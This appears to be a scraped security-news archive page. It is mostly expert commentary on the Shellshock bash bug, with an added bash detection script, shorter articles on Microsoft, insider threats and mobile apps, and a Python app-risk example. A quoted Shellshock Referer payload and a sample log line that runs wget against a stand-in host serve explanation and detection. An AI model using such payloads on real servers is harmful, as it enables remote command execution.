 “The ‘shellshock’ bash vulnerability is a big deal. It’s going to impact large numbers of internet-facing Linux/Unix/OS X systems as bash has been around for many years and is frequently used as the ‘glue’ to connect software components used in building applications. Vulnerable network-facing applications can easily be remotely exploited to allow an attacker to gain access to the system, executing with the same privilege the application has. From there, an attacker would attempt to find a privilege escalation vulnerability to enable them to achieve total compromise.

Bash is a very complex and feature-rich piece of software that is intended for interactive use by power users. It does way more than is typically required for the additional role for which it is often employed in gluing components together in applications. Thus it presents an unnecessarily broad attack surface — this likely won’t be the last vulnerability found in bash. Application developers should try to avoid invoking shells unless absolutely necessary, or use minimalist shells where required.”

 

Mark Parker, Senior Product Manager at iSheriff:

 “This bash vulnerability is going to prove to be a much bigger headache than Heartbleed was. In addition to the general Mac OS X, Linux and Unix systems that need to be patched, there are also thousands upon thousands of Internet connected Linux and Unix based embedded devices, such as DVRs, home automation systems, automotive entertainment systems, mobile phones, home routers, manufacturing systems and printers.

Most of these devices will be susceptible because most Linux based devices run bash; it is such an integral part of the Linux OS. I anticipate that we will continue to see the fallout from this vulnerability for a long time to come.”

Carl Wright, General Manager of TrapX Security:

“We feel that the industry will take this very seriously and come out with patches for this vulnerability ASAP. It could take us years to understand how many systems were compromised and how many were used to escalate privileges into systems without this vulnerability. The transitive trust nature of directory architectures and authentication systems could mean we are living with this far beyond patching the current systems if this exploit has been taken advantage of even at a small 1% level.”

Coby Sella, CEO of Discretix:

“This is the second time over the last six months when a key infrastructure component used by billions of connected things across a variety of industries has been compromised. We see this problem only getting worse as more and more unsecured or not adequately secured things are rolled out without any comprehensive security solution that reaches all the way down to the chipset. Real solutions to this problem must cover every layer from the chipset to the cloud enabling companies to remotely insert secrets into the chipset layer via secured connections within their private or cloud infrastructure.”

Nat Kausik, CEO, Bitglass:

“Enterprises with ‘trusted endpoint’ security models for laptops and mobile devices are particularly vulnerable to this flaw.  Malware can exploit this vulnerability on unix-based laptops such as Mac and Chromebook when the user is away from the office, and then spread inside the corporate network once the user returns to the office.”

Steve Durbin, Managing Director of the Information Security Forum:

“The Bash vulnerability simply stresses the point that there is no such thing as 100% security and that we all need to take a very circumspect and practical approach to how we make use of the devices that we use to share data both within and outside the home and our businesses. I have my doubts on whether or not this will lead to a wave of cyber-attacks, but that is not to say that the vulnerability shouldn’t be taken seriously. It is incumbent upon all of us as users to guard our data and take all reasonable precautions to ensure that we are protecting our information as best as we are realistically able.”

Steve Lowing, Director of Product Management, Promisec:

“Generally, the Bash vulnerability could be really bad for systems, such as smart devices including IP cameras, appliances, embedded web servers on routers, etc., which are not updated frequently. The exposure for most endpoints is rapidly being addressed in the form of patches to all flavors of UNIX including Red Hat and OS X. Fortunately for Microsoft, they avoid much of this pain since most Windows systems do not have Bash installed on them.

For vulnerable systems, depending on how they are leveraging the Bash shell, the results could be grave. For example, a webserver that uses CGI would likely be configured to use Bash as the shell for executing commands, and compromising this system via this vulnerability is fairly straightforward. The consequences could be to delete all web content, which could mean service level agreements (SLAs) are not met because of complete outage, or to deface the site, which tarnishes your brand, or even to be a point of infiltration for a targeted attack, which could mean IP and/or sensitive customer information loss.

The IoT is likely under the biggest risk since many of these devices and appliances are not subject to frequent software updates like a desktop or laptop or server would be. This could result in many places for an attacker to break into and lie in wait for sensitive information to come their way.”

Jason Lewis, Chief Collection and Intelligence Officer, Lookingglass Cyber Solutions:

“The original vulnerability was patched by CVE-2014-6271. Unfortunately this patch did not completely fix the problem. This means even patched systems are vulnerable.

Several proofs of concept have been released.  The exploit has the ability to turn into a worm, so someone could unleash an exploit to potentially infect a huge number of hosts.”

Ron Gula, Chief Executive Officer and Chief Technical Officer, Tenable Network Security: 

“Auditing systems for ShellShock will not be like scanning for Heartbleed. Heartbleed scans could be completed by anyone with network access with high accuracy. With ShellShock, the highest form of accuracy to test for this is to perform a patch audit. IT auditing shops that don’t have mature relationships with their IT administrators may not be able to audit for this.

Detecting the exploit of this is tricky. There are network IDS rules to detect the attack on unencrypted (non-SSL) web servers, but IDS rules to look for this attack over SSL or SSH won’t work. Instead, solutions which can monitor the commands run by servers and desktops can be used to identify commands which are new, anomalistic and suspect.”

Mike Spanbauer, Managing Director of Research, NSS Labs:

“Bash is an interpretive shell that makes a series of commands easy to implement on a Unix derivative. Linux is quite prevalent today throughout the Web, both as a commerce platform and as a commercial website platform. It happens to be the default script shell for Unix, Linux, well… you get the picture.

The core issue is that the vulnerability initially highlights the ease with which an attacker might take over a Web server running CGI scripting and ultimately ‘get shell’, which offers the attacker the means to reconfigure the access environment, get to sensitive data or compromise the victim machine in many ways.

As we get to the bottom of this issue, it will certainly be revealed just how bad this particular discovery is – but there is a chance it’s bigger than Heartbleed, and that resulted in thousands of admin hours globally applying patches and fixes earlier this year.”

Contrast Security CTO and co-founder Jeff Williams:

 “This is a pretty bad bug. The problem happens because bash supports a little used syntax for ‘exported functions’ – basically a way to define a function and make it available in a child shell.   There’s a bug that continues to execute commands that are defined after the exported function.

So if you send an HTTP request with a referrer header that looks like this: Referer:() { :; }; ping -c 1 11.22.33.44. The exported function is defined by this crazy syntax () { :; };  And the bash interpreter will just keep executing commands after that function.  In this case, it will attempt to send a ping request home, thus revealing that the server is susceptible to the attack.

Fortunately there are some mitigating factors.  First, this only applies to systems that do the following things in order: 1) Accept some data from an untrusted source, like an HTTP request header, 2) Assign that data to an environment variable, 3) Execute a bash shell (either directly or through a system call).

If they send in the right data, the attacker will have achieved the holy grail of application security: ‘Remote Command Execution.’  An RCE basically means they have completely taken over the host.

Passing around data this way is a pretty bad idea, but it was the pattern back in the CGI days.  Unfortunately, there are still a lot of servers that work that way.  Even worse, custom applications may have been programmed this way, and they won’t be easy to scan for.  So we’re going to see instances of this problem for a long long time.”
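The two practical points above, Ron Gula’s (a patch audit, not a network scan, is the accurate test) and Jeff Williams’ (an exploit attempt carries the `() {` exported-function marker in a request header), translate into the script below. It is an added example for this column, not code from SecurityWeek or from any of the quoted vendors. It assumes a `bash` binary on PATH for the local check; the log lines it scans are constructed here in Apache combined format with documentation-range addresses, not real traffic.

```shell
#!/usr/bin/env bash
# Added example (not code from the column or the quoted experts).
# Two CVE-2014-6271 checks: a local patch test of a bash binary, and a grep
# over constructed web-server log lines for the "() {" marker that an
# exploit attempt carries in a Referer or User-Agent header.

# Return 0 if the bash at $1 (default: "bash" on PATH) still executes the
# commands that trail a function definition passed in through the
# environment, 1 if it does not, 2 if no such binary can be run.
shellshock_local_check() {
    bash_bin="${1:-bash}"
    command -v "$bash_bin" >/dev/null 2>&1 || return 2
    # Classic probe: a vulnerable bash prints VULNERABLE before "safe";
    # a patched bash prints only "safe" (stderr may carry a warning).
    out=$(env x='() { :; }; echo VULNERABLE' "$bash_bin" -c 'echo safe' 2>/dev/null)
    case "$out" in
        *VULNERABLE*) return 0 ;;
        *)            return 1 ;;
    esac
}

# Print every log line from stdin whose quoted Referer or User-Agent field
# starts with the exported-function marker "() {" (any whitespace allowed
# between the parentheses and the brace).
shellshock_log_hits() {
    grep -E '"\(\)[[:space:]]*[{]'
}

# Number of such lines on stdin (0 when none).
shellshock_log_hit_count() {
    n=$(shellshock_log_hits | wc -l)
    echo $((n + 0))
}

# Constructed sample in Apache combined log format (not real traffic;
# addresses come from the RFC 5737 documentation ranges). Lines 2 and 3
# carry probes of the kind Jeff Williams describes; lines 1 and 4 are
# ordinary requests.
SAMPLE_LOG='203.0.113.5 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Sep/2014:10:01:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { :; }; ping -c 1 192.0.2.10" "curl/7.37.0"
198.51.100.7 - - [25/Sep/2014:10:01:15 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "() { :;}; /bin/bash -c \"wget http://192.0.2.10/x\""
192.0.2.44 - - [25/Sep/2014:10:02:00 +0000] "GET /about HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"'

if shellshock_local_check bash; then
    echo "local bash: VULNERABLE to CVE-2014-6271, patch it"
else
    echo "local bash: not vulnerable (or no bash binary found)"
fi
printf '%s\n' "$SAMPLE_LOG" | shellshock_log_hits
```

On a patched bash the local check reports not vulnerable. The grep covers only the plain-text case Gula mentions for network sensors, but a header sent over TLS is still written to the web server’s own access log after decryption, so the same pattern works on server-side logs where an IDS is blind; it will not catch a probe sent through a header the server does not log.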

Tal Klein, Vice President of Strategy at Adallom:

 “What I don’t like to see is people comparing Shellshock to Heartbleed. Shellshock is exponentially more dangerous because it allows remote code execution, meaning a successful attack could lead to the zombification of hosts. We’ve already seen one self-replicating Shellshock worm in the wild, and we’ve already seen one patch circumvention technique that requires patched Bash to be augmented in order to be ‘truly patched’. What I’m saying is that generally I hate people who wave the red flag about vulnerabilities, but this is a 10 out of 10 on the awful scale and poses a real threat to core infrastructure. Take it seriously.”

Michael Sutton, Vice President of Security Research at Zscaler:

“Robert Graham has called the ‘Shellshock’ vulnerability affecting bash ‘bigger than Heartbleed.’ That’s a position we could defend or refute; it all depends upon how you define bigger. Will more systems be affected? Definitely. While both bash and OpenSSL, which was impacted by Heartbleed, are extremely common, bash can be found on virtually all *nix systems, while the same can’t be said for OpenSSL, as many systems simply wouldn’t require SSL communication. That said, we must also consider exploitability, and here is where I don’t feel that the risk posed by Shellshock will eclipse Heartbleed.

Exploiting Heartbleed was (is) trivially easy. The same simple malformed ‘heartbeat’ request would trigger data leakage on virtually any vulnerable system. This isn’t true for Shellshock as exploitation is dependent upon influencing bash environment variables. Doing so remotely will depend upon the exposed applications that interact with bash. Therefore, this won’t quite be a ‘one size fits all’ attack. Rather, the attacker will first need to probe servers to determine not only those that are vulnerable, but also how they can inject code into bash environment variables.

The difference here is that we have to take application logic into account with Shellshock and that was not required with Heartbleed. That said, we’re very much in the same boat, having potentially millions of vulnerable machines, many of which will simply never be patched. Shellshock, like Heartbleed, will live on indefinitely.”

Mamoon Yunus, CEO of Forum Systems: 

“The Bash vulnerability has the potential to be much worse than Heartbleed. Leaking sensitive data is obviously bad but the Bash vulnerability could lead to losing control of your entire system.

The Bash vulnerability is a prime example of why it’s critical to take a lockdown approach to open, free-for-all shell access, a practice that is all too common for on-premise and cloud-based servers. Mobile applications have caused an explosion in the number of services being built and deployed. Such services are hosted on vanilla Linux OS variants with little consideration given to security and are typically close to the corporate edge. Furthermore, a large number of vendors use open Linux OSes, install their proprietary functionality, and package commercial network devices that live close to the network edge at Tier 0. They do so with full shell access instead of building a locked-down CLI for configuration.

The Bash vulnerability is a wake-up call for corporations that continue to deploy business functionality at the edge without protecting their services and API with hardened devices that do not provide a shell-prompt for unfettered access to OS internals for anyone to exploit.”

Jody Brazil, CEO of FireMon:

“This is the kind of vulnerability that can be exploited by an external attacker with malicious intent. So, how do those from the Internet, partner networks or other outside connection gain access to this type of exposure?

An attack vector analysis that considers network access through firewalls and address translation can help identify which systems are truly exposed. Then, determine if it’s possible to mitigate the risk by blocking access, even temporarily. In those cases where this is not an option, prioritizing patching is essential. In other cases, where, for example, there is remote access to a vulnerable system that is not business-critical, access can be denied using existing firewalls.

This helps security organizations focus their immediate patching efforts and maximize staffing resources. It’s critical to identify the greatest risk and then prioritize remediation activities accordingly. Those are key best practices to address Bash or any vulnerability of this nature.”

Mark Stanislav, Security Researcher at Duo Security:

“While Heartbleed eventually became an easy vulnerability to exploit, it was ultimately time consuming, unreliable and rarely resulted in ‘useful’ data output. Shell Shock, however, effectively gives an attacker remote code execution on any impacted host with a much easier means to exploit than Heartbleed and greater potential results for criminals.

Once a web application or similarly afflicted application is found to be vulnerable, an attacker can do anything from download software, to read/write system files, to escalating privilege on the host or across internal networks. More damning, of course, is that the original patch to this issue seems to be flawed and now it’s a race to get a better patch released and deployed before attackers leverage this critical bug.”

Rob Sadowski, Director of Technology Solutions at RSA:

“This is a very challenging vulnerability to manage because the scope of potentially affected systems is very large, and can be exploited in a wide variety of forms across multiple attack surfaces. Further, there is no single obvious signature to help comprehensively detect attempts to exploit the vulnerability, as there are so many apps that access BASH in many different ways.

Because many organizations had to recently manage a vulnerability with similar broad scope in Heartbleed, they may have improved their processes to rapidly identify and remediate affected systems which they can leverage in their efforts here.” 

Joe Barrett, Senior Security Consultant, Foreground Security:

“Right now, Shellshock is making people drop everything and scramble to fix patches. Security experts are still expanding the scope of the vulnerability, finding more devices and more methods in which this vulnerability can be exploited. But no one has gotten hacked and been able to turn around and point and say ‘It was because of shellshock’ that I’ve seen.

If you have a Linux box, patch it. Now. Do you have a Windows box using Cygwin? Update Cygwin to patch it. And then start trying to categorize all of the ‘other’ devices on the network and determining if they might be vulnerable. Because chances are a lot of them are.

Unfortunately, vendors probably will never release patches to solve this for most appliances, because most [Internet-connected] appliances don’t even provide a way to apply such an update. But for the most part all you can do is try to identify affected boxes and move them behind firewalls and out of the way of anyone’s ability to reach them. Realistically, we’ll probably still be exploiting this bug in penetration tests in 8 years. Not to mention all of the actual bad guys who will be exploiting this.”

Until Next Friday…Have a Great Weekend!

Related Reading: What We Know About Shellshock So Far, and Why the Bash Bug Matters


Microsoft Shutting Down Trustworthy Computing Unit

Posted on September 23, 2014 by in Security

As part of its reorganization efforts, Microsoft has decided to shut down its Trustworthy Computing (TwC) unit that has been focusing on improving customers’ trust in the company’s commercial products.

While TwC will no longer function as a standalone business unit, its general manager, John Lambert, noted on Twitter that they’re just moving to a new home and that “SDL [Security Development Lifecycle], operational security, pentest, MSRC [Microsoft Security Response Center], Bluehat are just under a new roof.”

Some members of the TwC team are among the 2,100 employees laid off by Microsoft last week. However, most of the team will join the company’s Cloud and Enterprise Division or the Legal and Corporate Affairs group.

“I will continue to lead the Trustworthy Computing team in our new home as part of the Cloud and Enterprise Division. Significantly, Trustworthy Computing will maintain our company-wide responsibility for centrally driven programs such as the Security Development Lifecycle (SDL) and Online Security Assurance (OSA),” Scott Charney, corporate vice president of Trustworthy Computing, said in a blog post on Monday. “But this change will also allow us to embed ourselves more fully in the engineering division most responsible for the future of cloud and security, while increasing the impact of our critical work on privacy issues by integrating those functions directly into the appropriate engineering and legal policy organizations.”

“I was the architect of these changes. This is not about the company’s loss of focus or diminution of commitment. Rather, in my view, these changes are necessary if we are to advance the state of trust in computing,” Charney added.

Microsoft’s Trustworthy Computing initiative was announced back in 2002 by Bill Gates, who emphasized at the time the need for such a platform.

“Every week there are reports of newly discovered security problems in all kinds of software, from individual applications and services to Windows, Linux, Unix and other platforms. We have done a great job of having teams work around the clock to deliver security fixes for any problems that arise. Our responsiveness has been unmatched – but as an industry leader we can and must do better,” Gates said in a memo to employees.

Brad Hill, Web security technologist at eBay, explained in a post on Google+ the importance of TwC and its impact on the security landscape over the past years.

“That Trustworthy Computing diaspora today constitutes a big part of the core of the modern information security industry.  Veterans of TwC are security leaders in at Yahoo, Google, PayPal, Facebook, Adobe, VMWare and dozens of other companies,” Hill said. “From the hapless, hopeless position the industry found ourselves in a dozen years ago, we’re today starting to stand up credible defenses against nation-state level attackers. And while the heavyweight SDL processes of five years ago have been streamlined even at Microsoft, every security program today has some of the DNA of Trustworthy Computing in it and thinks about the job it exists to do in a different way because of it.”

In addition to shutting down the Trustworthy Computing unit, Microsoft is closing down its research facility in Silicon Valley.

The organization plans on cutting a total of 18,000 jobs, representing 14% of its workforce. Roughly 12,500 of the job cuts are related to the recently acquired mobile device manufacturer Nokia.

 

Previous Columns by Eduard Kovacs:


SecurityWeek RSS Feed

Insider vs. Outsider Threats: Can We Protect Against Both?

Posted on June 26, 2014 by in Security

Media reports affirm that malicious insiders are real. But unintentional or negligent actions can introduce significant risks to sensitive information too. Some employees simply forget security best practices or shortcut them for convenience reasons, while others just make mistakes.

Some may not have received sufficient security awareness training and are oblivious to the ramifications of their actions or inactions. They inadvertently download malware, accidentally misconfigure systems, or transmit and store sensitive data in ways that place it at risk of exposure.

Personnel change too. Companies hire new employees, and promote and transfer individuals to new roles. They augment staff with temporary workers and contractors. New leadership comes onboard. Many of these insiders require legitimate access to sensitive information, but needs differ with changing roles, tenure, or contract length. It’s extremely challenging to manage user identities and access privileges in this environment, not to mention the people themselves. A person who was once trustworthy might gradually become an insider threat – while another becomes a threat immediately, overnight.

New technologies and shifting paradigms further complicate matters. The evolving trends of mobility, cloud computing and collaboration break down the traditional network perimeter and create complexity. While these new tools and business models enhance productivity and present new opportunities for competitive advantage, they also introduce new risks.

At the same time, you can’t ignore outsider threats, which are responsible for the lion’s share of breaches. Since 2008, the Verizon Data Breach Investigations Report has shown that external actors – not insiders – are responsible for the vast majority of the breaches it investigated. Some of the top reasons why those breaches succeeded include weak credentials, malware propagation, privilege misuse, and social tactics. These are precisely the types of weaknesses that trace back to the actions (or inactions) of insiders: an external attacker typically gets in by abusing a credential, a privilege, or a mistake that belongs to someone on the inside.

The question isn’t whether to focus on the insider or outsider threat. The question is how to defend against both – equally effectively.

What’s needed is a threat-centric approach to security that provides comprehensive visibility, continuous control, and advanced threat protection regardless of where the threat originates. To enable this new security model, look for technologies that are based on the following tenets:

Visibility-driven: Security administrators must be able to accurately see everything that is happening. When evaluating security technologies, breadth and depth of visibility are equally important to gain knowledge about environments and threats. Ask vendors if their technologies will allow you to see and gather data from a full spectrum of potential attack vectors across the network fabric, endpoints, email and web gateways, mobile devices, virtual environments, and the cloud. These technologies must also offer depth, meaning the ability to correlate that data and apply intelligence to understand context and make better decisions.

Threat-focused: Modern networks extend to wherever employees are, wherever data is, and wherever data can be accessed from. Keeping pace with constantly evolving attack vectors is a challenge for security professionals and an opportunity for insider and outsider threats. Policies and controls are essential to reduce the surface area of attack, but breaches still happen. Look for technologies that can also detect, understand, and stop threats once they’ve penetrated the network and as they unfold. Being threat-focused means thinking like an attacker, applying visibility and context to understand and adapt to changes in the environment, and then evolving protections to take action and stop threats.

Platform-based: Security is now more than a network issue; it requires an integrated system of agile and open platforms that cover the network, devices, and the cloud. Seek out a security platform that is extensible, built for scale, and can be centrally managed for unified policy and consistent controls. This is particularly important since breaches often stem from the same weaknesses regardless of whether they result from insider actions or an external actor. This constitutes a shift from deploying point security appliances that leave gaps between them, to integrating a true platform of scalable services and applications that are easy to deploy, monitor, and manage.

Protecting against today’s threats – whether they originate from the inside or the outside – is equally challenging. But the two have a lot in common, tapping into many of the same vulnerabilities and methods to accomplish their missions. There’s no need to choose which to prioritize as you allocate precious resources. With the right approach to security you can protect your organization’s sensitive information from both insiders and outsiders.

Marc Solomon, Cisco’s VP of Security Marketing, has over 15 years of experience defining and managing software and software-as-a-service platforms for IT Operations and Security. He was previously responsible for the product strategy, roadmap, and leadership of Fiberlink’s MaaS360 on-demand IT Operations software and managed security services. Prior to Fiberlink, Marc was Director of Product Management at McAfee, responsible for leading a $650M product portfolio. Before McAfee, Marc held various senior roles at Everdream (acquired by Dell), Deloitte Consulting and HP. Marc has a Bachelor’s degree from the University of Maryland, and an MBA from Stanford University.

Previous Columns by Marc Solomon:



Cyber Risk Intelligence: What You Don’t Know is Most Definitely Hurting You

Posted on June 20, 2014 by in Security


Growing up, one of my father’s favorite sayings was “luck favors the prepared.”

I must have heard it a thousand times over the years. It was almost always spoken just after some sad scenario where I had failed to stay alert, informed and aware, thus my ending up at a loss. Sometimes a big loss. It was his belief that, if you’re always broadly observant of things that affect your life, good things have a better chance of happening to you. He has always been right.

Nowadays, I find myself applying this lesson to cybersecurity and cyberdefense.

More than just nifty tools and solutions, robust IT budgets, threat intelligence firehoses and rigid security policies, I’m learning over and over again that practical, habitual day-in/day-out awareness is invaluable at helping you avoid becoming a victim of cybercrime – and lessening the impact when cybercrime inevitably happens to you and your organization.

Cybercrime is all around us.

One day it may become second nature to stay constantly informed about cyber risks facing us and our businesses. We’re certainly not there yet. Sooner or later, we may all need to get used to the idea of constantly consuming data about our risks and vulnerabilities in order to act safer. It’s likely sooner rather than later. To really accomplish this type of awareness, though, takes the right levels of information. Not just data. In fact, we’re all awash in data. But more on that later.

What we need is high-quality cybercrime information that’s comprehensive, yet also focused and simple to digest. Information that’s current, consistent, intuitive, continuous and, most importantly, easy to draw conclusions from that have meaning specific to you, your business and the decisions you face. It’s what I call “complete context.”

And there’s more.

To truly benefit from this sort of information takes more than just the info itself. Just as my father also told me, it takes focus, effort and commitment. Every day. Something he just called “hard work.”

Current Data + Contextually-Relevant Info + Continuous Awareness + Hard Work = Practical Solutions

Of course, the familiar modern-day version of my father’s favorite is “Chance favors the prepared mind,” said by Louis Pasteur, French microbiologist, father of pasteurization, and father of the germ theory of disease. For Pasteur, the saying meant that, by staying diligently informed of all things surrounding your problem space, you’ll see solutions to tough problems more quickly.

For years and years he labored at the microscope, observing, collecting data and analyzing. But it was his devotion to basic research on more than just the problem itself – and the quick delivery of practical applications based on what he learned – that led him to his biggest breakthroughs against unseen and deadly illnesses. Eventually, thanks to Pasteur’s way of working, we developed critical medicines such as vaccines.

Studying a problem from every angle and every level always leads to more practical solutions and quicker (re)action.

Although Pasteur labored in the medical and biological fields, his work was in many ways analogous to modern cybersecurity. Today, scientists and researchers battle similar unseen forces, all around us, making us sick in various ways. Our networks and computers and mobile devices are constantly exposed to harmful pathogens and viruses. And, with the Target breach and things like Heartbleed, real people now know these things are fatal in their own way.

But in today’s world, we seem to have gone off track a bit in trying to cure our cyber ills.

In much the same way as in Pasteur’s day, many smart people today labor to observe, collect data and draw conclusions. However, most of them, unlike Pasteur, are not able to arrive at real practical breakthroughs that change the world.

Why is this the case?

For me, it’s mostly a simple answer:

We focus so much on looking down the barrel of individual microscopes, we get lost in all the low-level noise that’s far too focused on only a few dimensions of the problem.

Let me use Pasteur again to explain more simply.

Had Pasteur only observed the smallest bits floating around under his glass, he would’ve likely not been remembered in history. Instead, Pasteur gathered data about sick people, who they were, where they lived, how old they were, what gender, what symptoms they had, what prior illnesses they had been subject to, what their jobs were and what they had in common.

He observed animals, how they behaved, how long it took for them to become sick when they did, what they ate, where they lived and more. He even observed how rotting meat behaved, how it decomposed, how it compared to other plant and animal matter and on and on. He focused on all sides of the issue; the causes, the victims and, of course, their symptoms. Pasteur observed every facet of his problem set from high level to low, and turned basic data collection – from many dimensions at once and from all angles – into information he could use to draw practical conclusions.

Put simply, Pasteur had complete context because he performed “intelligence gathering.” But, by focusing on more than just the threat itself, Pasteur was also one of the first practitioners of risk analysis, or risk intelligence. It’s something we’ve only just begun to really apply to cyberdefense.

Continuous awareness of our own cyber risks compared to what’s possible and what’s happening around us right now is one of the missing pieces in current cyberdefense practices.

Today, we spend most of our cybersecurity efforts and dollars gathering massive amounts of data from millions of “microscoped” sources, but we rarely change perspectives or levels. We want to know what’s threatening us, but can’t seem to understand the picture is much bigger. Too rarely do we push back from the lenses trained only on data sets inside our specific organizations to pick our heads up and look around.

I like to call it “cyber navel gazing.”

You see, outside the microscope, there’s just so much other useful data – mostly not being stored and analyzed – that can be turned into helpful information, then into practical solutions.

Yet, we continuously employ tens of thousands of tools, solutions and applications that comb through huge bins of raw packet data, endless streams of netflow, long-term signature repositories, terabytes of log files, interface dumps and more.

In fact, it’s as if all we do is peer through the scopes at our own micro worlds and draw conclusions that themselves lead to other tools begetting other massive piles of micro data.

Are these things all bad? Of course not. And they’re all part of fighting the fight against cyber disease. But in all of this we miss out on the bigger picture. Rarely do we store data, day in and day out, on what we’re getting hit with, how threats are occurring and what’s happening as a result. Neither are we matching that up to what our specific, individual symptoms are, who we are as targets, where we’re from, what types of companies we are, who our customers are, what technologies we’re using and on and on.

What would Pasteur say to us now if he were brought in to consult on our cyber sickness?

He’d probably just say, “Luck favors the prepared.” Then he’d tell us to start over. From the top this time.

Jason Polancich is founder and Chief Architect at SurfWatch Labs. He is a serial entrepreneur focused on solving complex internet security and cyber-defense problems. Prior to founding SurfWatch Labs, Mr. Polancich co-founded Novii Design, which was sold to Six3 Systems in 2010. In addition to completing numerous professional engineering and certification programs through the National Cryptologic School, Polancich is a graduate of the University of Alabama, with degrees in English, Political Science and Russian. He is a distinguished graduate of the Defense Language Institute (Arabic) and has completed foreign study programs through Boston University in St. Petersburg, Russia.

Previous Columns by Jason Polancich:



Mobile Ad Libraries Put Enterprise Data at Risk, Firm Says

Posted on June 4, 2014 by in Security

Mojave Networks Introduces Mobile Application Reputation Feature

Mojave Networks has added a new feature to the company’s professional and enterprise services in an effort to help organizations minimize the risks posed by the mobile applications used by their employees.

According to the company, organizations can use the new feature to discover potential risks by analyzing data collected and transmitted from mobile apps, and create policies for data loss prevention based on the information.

The new mobile application reputation offering, which is available immediately, includes features like customizable analytics, categorization of apps by risk level, application tracking, and integration with device management and network security solutions.

“The ‘bring your own device’ (BYOD) trend is transitioning to ‘bring your own applications’ (BYOA) as users download more and more apps to share data, increase productivity and stay connected,” noted Garrett Larsson, CEO and co-founder of Mojave Networks.

“If any application running on a mobile device connected to the network is insecure, it can put highly sensitive corporate data at risk. Our new application reputation feature can help enterprises improve their mobile security posture by eliminating the risk of insecure applications.”

The company analyzes over 2,000 mobile apps every day by tracking 200 individual risk factors in 15 different categories. In addition to static and dynamic analysis, Mojave Networks said that it uses data from real-world usage of the tested applications to determine if an application is safe.

One risk that’s particularly problematic for enterprises is when private data is collected and sent to remote Web APIs, the company warned.

“Some of the most significant risk factors affecting corporate employees and individual mobile users, such as data loss and PII collection, occur not by the application itself, but within mobile advertising libraries and other library components such as social media or analytic tools,” Ryan Smith, Mojave’s lead threat engineer, explained in a blog post.

Based on the analysis of more than 11 million URLs to which mobile apps connect, Mojave Threat Labs determined that business users connect to at least as many data-gathering libraries as consumers. During its analysis, the company found that 65% of applications downloaded by business users connect to an advertising network, and 40% of them connect to a social network API.

“It is critically important that users and IT Administrators understand what data is being collected from their devices, where it is being sent, and how it is being used. Given that the majority of the sensitive data being collected occurs within these third party libraries such as ad networks, social media APIs, and analytics tools, it is therefore important to fully understand each of the libraries included in your mobile apps,” Smith noted.

Founded in San Mateo, CA in 2011, Mojave Networks raised a $5 million round of funding in November 2013, in addition to launching a cloud-based, enterprise-grade solution that protects mobile devices starting at the network level.
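The kind of analysis the article describes, reduced to its core: attribute each app's outbound requests to a library category (ad network, social API, analytics, first party), flag sensitive fields leaving the device through a third-party library, and turn the result into a risk level and a DLP action. This is an added illustration written for this page, not Mojave Networks' code; the host-to-category table, the sensitive-field list, the observations and the risk thresholds are all constructed assumptions standing in for a real reputation feed and real traffic captures.

```python
"""Per-app risk categorization from observed outbound requests (added example)."""
from collections import defaultdict
from dataclasses import dataclass

# Assumption: a tiny host -> library-category table standing in for a real
# domain/library reputation feed.
HOST_CATEGORY = {
    "ads.adnet.example": "ad_network",
    "graph.social.example": "social_api",
    "collect.analytics.example": "analytics",
    "api.corp.example": "first_party",
}

# Assumption: fields treated as PII/sensitive when they leave the device.
SENSITIVE_FIELDS = frozenset({"imei", "contacts", "location", "account_email"})

# Categories that count as third-party libraries; an unlisted host is treated
# as unknown (and therefore also third party) rather than trusted.
THIRD_PARTY = frozenset({"ad_network", "social_api", "analytics", "unknown"})

DLP_ACTION = {"high": "block", "medium": "review", "low": "allow"}


@dataclass(frozen=True)
class Observation:
    app: str            # package / bundle name
    host: str           # destination host of one observed request
    fields: frozenset   # data fields seen in that request


# Constructed sample traffic: one record per observed request.
SAMPLE_OBSERVATIONS = [
    Observation("notes", "api.corp.example", frozenset({"doc_id", "account_email"})),
    Observation("weather", "ads.adnet.example", frozenset({"location", "device_model"})),
    Observation("weather", "collect.analytics.example", frozenset({"screen"})),
    Observation("chat", "graph.social.example", frozenset({"session_token"})),
    Observation("game", "cdn.unlisted.example", frozenset({"score"})),
]


def risk_level(categories, leaks):
    """High if PII reaches a third-party library, medium if any third-party
    library is contacted at all, low if only first-party endpoints are used."""
    if leaks:
        return "high"
    if categories & THIRD_PARTY:
        return "medium"
    return "low"


def analyze(observations=SAMPLE_OBSERVATIONS):
    """Return {app: {categories, leaks, level, decision}}."""
    categories = defaultdict(set)
    leaks = defaultdict(lambda: defaultdict(set))
    for obs in observations:
        cat = HOST_CATEGORY.get(obs.host, "unknown")
        categories[obs.app].add(cat)
        sensitive = obs.fields & SENSITIVE_FIELDS
        # Sensitive data to the app's own backend is expected; to an ad,
        # social, analytics or unknown host it is a leak.
        if sensitive and cat in THIRD_PARTY:
            leaks[obs.app][cat] |= sensitive
    report = {}
    for app, cats in categories.items():
        level = risk_level(cats, leaks[app])
        report[app] = {
            "categories": sorted(cats),
            "leaks": {c: sorted(f) for c, f in leaks[app].items()},
            "level": level,
            "decision": DLP_ACTION[level],
        }
    return report


def fleet_share(observations, category):
    """Percentage of apps in the sample that contact the given category,
    the same kind of figure as the article's 65% / 40% numbers."""
    report = analyze(observations)
    hits = sum(1 for entry in report.values() if category in entry["categories"])
    return round(100.0 * hits / len(report), 1)


if __name__ == "__main__":
    for app, entry in analyze().items():
        print(f"{app:8} {entry['level']:6} {entry['decision']:7} "
              f"cats={entry['categories']} leaks={entry['leaks']}")
    print("apps contacting an ad network:", fleet_share(SAMPLE_OBSERVATIONS, "ad_network"), "%")
```

The point to keep from this is the asymmetry in the leak rule: the same field (`account_email` here) is acceptable when sent to the app's own backend and a blocking finding when a bundled ad or analytics library sends it, which is why the report has to be built per destination and not per app.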

Previous Columns by Eduard Kovacs:



Most Mobile Breaches Will be Tied to App Misconfiguration by 2017: Gartner

Posted on May 30, 2014 by in Security

Analyst firm Gartner is predicting that by 2017, the focus of endpoint security breaches will shift to mobile devices such as tablets and smartphones.

With nearly 2.2 billion smartphones and tablets expected to be sold in 2014, Gartner believes attackers will continue to pay more attention to mobile devices. By 2017, 75 percent of mobile security breaches will be the result of mobile application misconfigurations, analysts said.

